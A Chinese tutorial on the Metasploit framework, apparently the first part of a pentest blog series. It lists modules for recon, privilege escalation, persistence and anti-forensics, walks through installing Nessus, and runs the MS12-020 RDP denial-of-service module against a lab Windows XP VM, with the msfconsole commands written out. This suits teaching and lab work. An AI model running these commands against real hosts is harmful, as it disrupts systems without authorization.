一、什么是Metasploit

Metasploit本质上是一个健壮且通用的渗透测试框架。它可以执行渗透测试生命周期中涉及的所有任务。有了Metasploit的使用,只需要关注核心目标,支持行动都将通过框架的各个组件和模块来执行。此外,由于它是一个完整的框架,而不仅仅是一个应用程序,因此可以根据我们的需求进行定制和扩展。

二、技术要求

  1. Kali Linux
  2. The Metasploit Framework
  3. Nessus
  4. NMAP
  5. w3af
  6. Armitage

三、Metasploit各生命周期中使用的组件与模块

阶段使用
信息收集Auxiliary modules: portscan/syn,portscan/tcp,smb version, db nmap, scanner/ftp/ftp version, andgather/shodan search
枚举smb / smb_enumshares, smb/ smb_enumusers, and smb/smb login
获取访问权限所有 Metasploit exploits 和 payloads
提权meterpreter-use priv and meterpreter-getsystem
权限维持meterpreter - run persistence
行迹覆盖Metasploit Anti-Forensics Project

四、Metasploit 辅助工具

1. Nessus

最流行的漏洞评估工具之一。它属于漏洞扫描程序类别。一旦Nessus告诉我们目标系统上存在哪些漏洞,我们就可以将这些漏洞提供给Metasploit,看看它们是否可以被真正利用。

2. 安装

Windows

  1. https://www.tenable.com/products/nessus/
  2. 选择合适版本(32-bit/64-bit)
  3. 下载并安装msi文件
  4. Open a browser and navigate to the URL :https://localhost:8834/
  5. 设置新username和password以访问Nessus控制台
  6. 申请注册, 点击 registering this scanner
  7. 访问http://www.tenable.com/products/nessus/nessus-plugins/获取激活码,选择 Nessus Home 输入注册详尽信息
  8. 输入通过电子邮件收到的注册码

Linux(详细)

  1. https://www.tenable.com/downloads/nessus?loginAttempted=true
  2. 以 kali linux (Debian 64位)为例
    在这里插入图片描述
  3. 拖动文件,复制到kali linux 中
  4. dpkg -i Nessus-8.15.3-debian6_amd64.deb
  5. service nessusd start
  6. service nessusd status
  7. 访问 https://localhost:8834/
  8. 选择Managed Scanner,然后选择继续
  9. 选择Tenable.sc
  10. 设置usernamepassword ,之后等待安装
  11. 注册邮箱 ,获取激活码
  12. 控制台进入 Nessus文件:
    cd /opt/nessus/sbin/
    ./nessuscli fetch --challenge 获取challenge code
  13. 访问:https://plugins.nessus.org/v2/offline.php 输入challenge code 和激活码,下载all.-2.x.tar.gz
  14. all.-2.x.tar.gz拖动至/opt/nessus/sbin下:
	1cp all-2.0.tar.gz /opt/nessus/sbin/
	2cd /opt/nessus/sbin/
	3: ./nessuscli update all-2.0.tar.gz
	4:  cp -r /opt/nessus/lib/nessus/plugins/ /opt/nessus/lib/nessus/plugins.bak/
	5:  service nessusd restart
  1. 后续操作修改plugin_feed_info.inc文件:
	1: vim /opt/nessus/var/nessus/plugin_feed_info.inc
	2: vim /opt/nessus/lib/nessus/plugins/plugin_feed_info.inc
	3: service nessusd restart
	4: cd /opt/nessus/lib/nessus
	5: rm -rf plugins
	6: mv plugins.bak/ plugins
	7: 重启kali
	8: service nessusd start
	9: 重新访问 https://localhost:8834/ 等待更新

3. kali自带 Namp

4. kali 自带Metasploit

kali安装 (虚拟机)

https://www.kali.org/get-kali/#kali-virtual-machines
安装完成后:

  1. 控制台输入 msfconsole
    在这里插入图片描述
  2. msf命令教程:https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

实例教程(仅供教学测试)

虚拟机:Windows XP(远程执行代码)https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020

  1. msf6> search ms12-020
    在这里插入图片描述
  2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    在这里插入图片描述
  3. 查看并设置参数(本地局域网测试)
    show options
    在这里插入图片描述
    set RHOST 192.168.116.35
    RHOST => 192.168.116.129 在这里插入图片描述
  4. run
    在这里插入图片描述

五、整理的帮助文档

官方文档:https://www.offensive-security.com/metasploit-unleashed/

Metasploit社区:http://resources.metasploit.com/

Metasploit指南:https://metasploit.help.rapid7.com/docs


笔者因才疏学浅初次尝试,尚有许多不足,望多加指正!

该期下一分节:渗透测试实战——(2.2)使用Metasploit进行Web渗透

Logo

更多推荐